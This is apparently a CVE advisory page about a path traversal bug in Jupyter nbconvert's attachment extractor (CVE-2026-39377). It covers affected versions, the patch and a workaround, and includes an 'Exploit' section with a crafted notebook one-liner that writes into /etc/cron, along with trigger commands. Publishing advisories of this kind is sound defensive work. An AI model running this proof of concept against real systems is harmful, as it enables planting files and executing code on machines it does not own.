nbconvert, Arbitrary File Write via Path Traversal, CVE-2026-39377 (Moderate)

Listen to this Post

The vulnerability exists in nbconvert, a Jupyter tool that converts notebooks to other formats via Jinja templates. The vulnerable component is the ExtractAttachmentsPreprocessor. This preprocessor is responsible for extracting cell attachments from notebooks and writing them to the filesystem. The flaw is that it passes attachment filenames directly to filesystem operations without any sanitization. This enables classic path traversal attacks using sequences like ../. Attackers can craft a malicious notebook where a cell attachment filename contains traversal sequences. When nbconvert processes such a notebook, the preprocessor writes the attachment to a location relative to the traversal path. Because no validation is performed, an attacker can write arbitrary content to any location the nbconvert process can access. The attacker controls both the destination path and the file extension. This can lead to overwriting sensitive system files, planting executable payloads, or modifying configuration files. The vulnerability affects all nbconvert versions from 6.5 through 7.17.0. The issue is fixed in version 7.17.1, which sanitizes attachment filenames. A workaround is to disable the `ExtractAttachmentsPreprocessor` entirely by setting --ExtractAttachmentsPreprocessor.enabled=False. The CVSS score is 6.5 (Medium), with high integrity and availability impacts.

dailycve form:

Platform: Jupyter nbconvert
Version: 6.5-7.17.0
Vulnerability: Path Traversal
Severity: Medium
date: 2026-04-21

Prediction: 2026-04-21

Analytics under What Undercode Say:

Check if vulnerable
pip show nbconvert | grep Version
nbconvert --version
Detect vulnerable versions
python -c "import nbconvert; print(nbconvert.<strong>version</strong>)"
Extract attachments preprocessor status
jupyter nbconvert --ExtractAttachmentsPreprocessor.enabled=True --help-all | grep enabled

Exploit:

Create malicious notebook with path traversal
echo '{"cells":[{"cell_type":"markdown","metadata":{},"source":["test"],"attachments":{"../../../etc/cron/evil":{"text/plain":"malicious"}}}]}' > evil.ipynb
Trigger exploit
jupyter nbconvert evil.ipynb --to html --ExtractAttachmentsPreprocessor.enabled=True
Verify file write
ls -la /etc/cron/evil

Protection from this CVE:

Upgrade to patched version
pip install --upgrade nbconvert>=7.17.1
Disable vulnerable preprocessor (workaround)
jupyter nbconvert notebook.ipynb --to pdf --ExtractAttachmentsPreprocessor.enabled=False
Or set in config file
echo "c.ExtractAttachmentsPreprocessor.enabled = False" >> ~/.jupyter/jupyter_nbconvert_config.py

Impact:

Complete arbitrary file write leading to remote code execution, data corruption, or denial of service.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top